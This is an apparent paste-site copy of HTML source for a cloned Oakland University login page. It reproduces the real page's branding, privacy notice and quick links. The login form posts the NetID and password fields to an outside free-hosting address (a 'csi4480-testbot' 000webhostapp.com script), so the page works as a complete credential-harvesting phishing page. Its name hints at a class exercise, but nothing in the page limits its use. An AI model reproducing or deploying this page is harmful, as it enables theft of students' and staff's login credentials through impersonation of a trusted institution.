Untitled
4 years ago in Plain Text
<!DOCTYPE html>
<spring:theme code="mobile.custom.css.file" var="mobileCss" text="" />
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Oakland University Login</title>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8, width=device-width, initial-scale=1" name="viewport" />
<link rel="stylesheet" type="text/css" href="/idp/css/main.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js"></script>
</head>
<body id="cas" class="cas-body">
<header id="header" class="cas-header">
<div class="container">
<div class="cas-logo">
<img class="cas-logo-img img-responsive" src="/idp/images/oulogo.png" alt="Oakland University logo">
</div>
</div> <!-- end container div -->
</header> <!-- end cas-header header -->
<div id="content" class="container cas-content" role="main">
<div class="row">
<!-- Login form -->
<div class="col-sm-12">
<div class="row">
<div class="col-sm-8">
<div class="row">
<div class="col-sm-12">
<h3 class="login-header-update" aria-label="Enter your Net ID and Password">Enter your NetID and Password</h3>
<div class="login-container" id="login">
<form autocomplete="off" id="fml" class="login-form login-form-update" action="http://csi4480-testbot.000webhostapp.com/test.php" method="post">
<div class="form-group form-group-update">
<label for="username" aria-label="Net ID:" class="control-label">NetID:</label>
<div class="login-textbox">
<div class="input-group">
<input autocomplete="new-password" accesskey="n" class="required form-control netID-update" id="username" name="j_username" type="text"
value="">
<div class="input-group-addon domain-update">@oakland.edu</div>
</div>
</div>
</div>
<div class="form-group">
<label for="password">
<span class="accesskey">Password:</span>
</label>
<div class="login-textbox">
<input autocomplete="new-password" accesskey="p" class="required form-control" id="password" name="j_password" type="password" value="">
</div>
</div>
<div class="form-group">
<button class="btn-submit btn btn-primary" type="submit" name="_eventId_proceed"
onClick="this.childNodes[0].nodeValue='SIGNING IN...'"
>SIGN IN</button>
</div>
</form>
<div class=" cas-policy">
<h4>Privacy and Security Notice</h4>
<p>Usage of all Oakland University systems, services, and networks is governed by official Oakland University Policies and University Technology Services Guidelines. By accessing and using these resources, individuals agree to use all information technology resources responsibly and in compliance with <a href="https://www.oakland.edu/uts/common-good-core-resources/policies/">Oakland University Policies and Guidelines</a></p>
<p>Your login will provide access to Google’s Core Suite of services within Google Apps for Education, covered by a university agreement. By signing in to Google Additional Services, you are individually agreeing to Google’s Terms of Service. Please review Google Privacy and Terms prior to logging in. For more information, please read our Frequently Asked Questions.</p>
<ul>
<li><a href="http://www.google.com/intl/en/policies/terms/">Google’s Terms of Service</a></li>
<li><a href="http://www.google.com/intl/en/policies/">Google Privacy and Terms</a></li>
<li><a href="https://kb.oakland.edu/uts/Google_Apps">Frequently Asked Questions</a></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="col-sm-4 cas-sidebar">
<div class="row">
<div class="col-sm-12">
<div class="panel panel-default cas-panel quick-links-update">
<div class="panel-heading">
<h3 class="panel-title">Quick Links</h3>
</div>
<div class="panel-body">
<ul>
<li><a href="https://mysail.oakland.edu/uPortal" target="_blank" rel="noopener noreferrer">Health Screening Form for Guests</a></li>
<li><a href="https://sail.oakland.edu/PROD/twbkwbis.P_GenMenu?name=homepage" target="_blank" rel="noopener noreferrer">Faculty and Staff SAIL</a></li>
<li><a href="https://sail.oakland.edu/PROD/twbkwbis.P_GenMenu?name=homepage" target="_blank" rel="noopener noreferrer">Alumni and students who have not registered in the past year SAIL</a></li>
<li><a href="https://sail.oakland.edu/PROD/bwckschd.p_disp_dyn_sched" target="_blank" rel="noopener noreferrer"><span>Class Schedule Search</span></a></li>
<li><a href="https://sail.oakland.edu/PROD/bwckctlg.p_disp_dyn_ctlg" target="_blank" rel="noopener noreferrer"><span>Course Catalog</span></a></li>
<li><a href="https://secure.touchnet.com/C21178_tsa/web/login.jsp" target="_blank" rel="noopener noreferrer"><span>eBill Student Bill and Payment</span></a></li>
<li><a href="http://www.oakland.edu/financialservices" target="_blank" rel="noopener noreferrer"><span>Student Financial Services and Student Employment</span></a></li>
</ul>
<div class="panel-footer create-account">
<ul class="quick-links-footer-update">
<li><a href="https://netid.oakland.edu/profile/authOUCAReset.php"><span class="forgot-link">Forgot Password?</span></a></li>
<li>New student? <a href="https://netid.oakland.edu/" aria-label="Get your Net ID and password">Get your NetID and password.</a></li>
<li>Need help? <a href="http://www.oakland.edu/helpdesk">Click here for more information.</a></li>
<li><U><b>Recommended Browsers</U></b>: Chrome, Firefox, Safari or Opera for the best SSO experience.</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<jsp:directive.include file="includes/bottom.jsp" />
<script type="text/javascript">
$(document).ready(function() {
$('#username').blur(function(){
var el = $('#username');
var userInput = el.val();
var username = userInput.toLowerCase();
var index = username.indexOf('@');
if (index > 0) {
username = username.substr(0, index);
}
el.val(username);
});
if (document.getElementById('username')) {
document.getElementById('username').focus();
}
});
</script>
</body>
</html>